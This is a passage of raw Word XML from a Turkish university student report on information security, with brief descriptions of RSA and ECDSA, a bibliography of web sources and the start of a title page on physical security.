        <w:t>Simetrik şifreleme, şifrelenmiş veriyi alan tarafın veriyi deşifre edebilmesi için, gizli anahtar paylaşımını gerekli kılar. Ancak RSA asimetrik bir şifreleme tekniği olduğu için gizli anahtarın paylaşılmasına gerek yoktur. Kullanıcıların gizli anahtarlarının saklanması gerekmez. Bu da sistemi büyük bir depolama yükünden kurtarır.Büyük sayılarla işlem yapmak zor olduğu için güvenilirliği son derece yüksek olan bir şifreleme tekniğidir[2].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ELIPTIK EĞRI DIJITAL İMZA ALGORITMASI(ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eliptik Eğri Dijital İmza Algoritması (ECDSA), eliptik eğri kriptografisinden (ECC) elde edilen anahtarları kullanan bir Dijital İmza Algoritmasıdır (DSA)[5].ECDSA diğer algoritmalara göre daha verimlidir[5].Eliptik eğrilerin şifrelemede kullanılmasıdır[6]. Eliptik eğri yaklaşımı standart RSA sisteminden daha zengin matematiksel prosedürler içermektedir[6].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ECDSA’nın Yararları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">işlemci gücü </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">saklama kapasitesi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">bant genişliği </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">güç tüketimi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sonuç olarak, ECDSA’nin smart kartlar,cep telefonları, sayısal posta işaretleri gibi</w:t>
      </w:r>
      <w:r w:rsidRPr="0022608A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C2C21" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>KAYNAKÇA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Security Management Handbook Kitabı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C2C21" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C2C21" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KONU:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Closed-Circuit Television and Video Surveillance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">            (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2C21">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Kapalı Devre Televizyon ve Video İzleme)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Konu: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Types of Information Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    (Bilgi Türleri Güvenlik kontrolleri)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[1] https://www.savaskartal.com/2010/04/14/sifreleme-algoritmalari/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[2]http://sutod.selcuk.edu.tr/sutod/article/viewFile/120/601</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[3]https://programsektoru.tr.gg/%26%23304%3Bmza-Algoritmas%26%23305%3B--k1-ECDSA-k2-.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[4] https://medium.com/@muhammedkaralar/dijital-i%CC%87mza-nedir-rsa-ve-dsa-nedir-617df03a97a6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[5]https://doubleoctopus.com/security-wiki/encryption-and-cryptography/elliptic-curve-digital-signature-algorithm/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] https://onekosmos.com/blog/the-elliptic-curve-digital-signature-algorithm/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0022608A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000877E1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000877E1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000877E1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C5EB6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004941F0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C1F7E4" wp14:editId="734FE581">
            <wp:extent cx="3076575" cy="2714625"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="4129" name="Resim 1" descr="C:\Users\Asiye\Desktop\Mikrodenetleyici\deney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e\Desktop\Mikrodenetleyici\deney2\images.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3076575" cy="2714625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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ATATÜRK ÜNİVERSİTESİ</w:t>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MÜHENDİSLİK FAKÜLTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009B08C5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>BİLGİSAYAR MÜHENDİSLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009B08C5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EB3B81" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB3B81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Bilgisayar Bilgi Güvenliği ve Yönetimi  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>FİZİKSEL GÜVENLİK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-273"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Section:10.2.2-10.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:jc w:val="center"/>
        <w:rPr>
